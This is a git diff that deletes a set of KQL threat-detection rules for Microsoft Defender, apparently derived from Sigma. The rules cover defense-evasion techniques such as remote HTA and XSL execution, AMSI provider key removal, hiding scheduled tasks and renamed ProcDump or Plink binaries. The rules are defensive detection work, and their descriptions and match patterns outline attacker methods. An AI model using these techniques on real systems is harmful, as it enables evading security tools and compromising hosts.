diff --git a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql b/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql
deleted file mode 100644
index 9b77679a..00000000
--- a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql b/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql
deleted file mode 100644
index ccf52622..00000000
--- a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
deleted file mode 100644
index d0784cd7..00000000
--- a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql b/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql
deleted file mode 100644
index 990767da..00000000
--- a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/07
-// Level: high
-// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index 0655e39c..00000000
--- a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index e7a8dadc..00000000
--- a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2022/04/15
-// Level: medium
-// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "SD")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql b/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql
deleted file mode 100644
index 3b5298d1..00000000
--- a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql	
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
-These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\shell\\open\\command") and (not(((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Opera\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Opera\\")) or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey contains "\\wireshark-capture-file"))))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql b/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql
deleted file mode 100644
index c887b9ee..00000000
--- a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/07
-// Level: medium
-// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CURL.EXE_Execution.kql b/Defense Evasion/Renamed_CURL.EXE_Execution.kql
deleted file mode 100644
index 5fedd523..00000000
--- a/Defense Evasion/Renamed_CURL.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql b/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql
deleted file mode 100644
index f1565826..00000000
--- a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_FTP.EXE_Execution.kql b/Defense Evasion/Renamed_FTP.EXE_Execution.kql
deleted file mode 100644
index a2a27522..00000000
--- a/Defense Evasion/Renamed_FTP.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql b/Defense Evasion/Renamed_Jusched.EXE_Execution.kql
deleted file mode 100644
index 059e77e2..00000000
--- a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Swisscom
-// Date: 2019/06/04
-// Level: high
-// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
-// Tags: attack.execution, attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql b/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_MegaSync_Execution.kql b/Defense Evasion/Renamed_MegaSync_Execution.kql
deleted file mode 100644
index b1b03fbb..00000000
--- a/Defense Evasion/Renamed_MegaSync_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/22
-// Level: high
-// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql b/Defense Evasion/Renamed_Msdt.EXE_Execution.kql
deleted file mode 100644
index a28480e4..00000000
--- a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/06/03
-// Level: high
-// Description: Detects the execution of a renamed "Msdt.exe" binary
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql b/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql
deleted file mode 100644
index fe83139c..00000000
--- a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Office_Binary_Execution.kql b/Defense Evasion/Renamed_Office_Binary_Execution.kql
deleted file mode 100644
index 88a5736c..00000000
--- a/Defense Evasion/Renamed_Office_Binary_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the execution of a renamed office binary
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql b/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql
deleted file mode 100644
index 98720000..00000000
--- a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024/01/11
-// Level: high
-// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Plink_Execution.kql b/Defense Evasion/Renamed_Plink_Execution.kql
deleted file mode 100644
index 76dd4df8..00000000
--- a/Defense Evasion/Renamed_Plink_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/06
-// Level: high
-// Description: Detects the execution of a renamed version of the Plink binary
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_ProcDump_Execution.kql b/Defense Evasion/Renamed_ProcDump_Execution.kql
deleted file mode 100644
index 09852431..00000000
--- a/Defense Evasion/Renamed_ProcDump_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/11/18
-// Level: high
-// Description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and (ProcessCommandLine contains " -accepteula " or ProcessCommandLine contains " /accepteula "))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql b/Defense Evasion/Renamed_Vmnat.exe_Execution.kql
deleted file mode 100644
index 9e5bf562..00000000
--- a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/09/09
-// Level: high
-// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql
deleted file mode 100644
index b9cadb73..00000000
--- a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql
deleted file mode 100644
index 2611f7a6..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql
deleted file mode 100644
index 0bf59ff5..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa\\" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql b/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql
deleted file mode 100644
index a929c0d8..00000000
--- a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/Defense Evasion/RunDLL32_Spawning_Explorer.kql b/Defense Evasion/RunDLL32_Spawning_Explorer.kql
deleted file mode 100644
index f0782750..00000000
--- a/Defense Evasion/RunDLL32_Spawning_Explorer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim, CD_ROM_
-// Date: 2022/04/27
-// Level: high
-// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql b/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql
deleted file mode 100644
index ae35c612..00000000
--- a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/11/15
-// Level: medium
-// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql b/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql
deleted file mode 100644
index 614c8ce9..00000000
--- a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
-// Date: 2020/10/18
-// Level: low
-// Description: This rule detects the execution of Run Once task as configured in the registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql b/Defense Evasion/Run_PowerShell_Script_from_ADS.kql
deleted file mode 100644
index 0e8c75dc..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
-// Date: 2019/10/30
-// Level: high
-// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
deleted file mode 100644
index bd9b3783..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
-// Date: 2020/10/17
-// Level: high
-// Description: Detects PowerShell script execution via input stream redirect
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql b/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql
deleted file mode 100644
index 7c4422f8..00000000
--- a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
-// Date: 2022/01/13
-// Level: medium
-// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
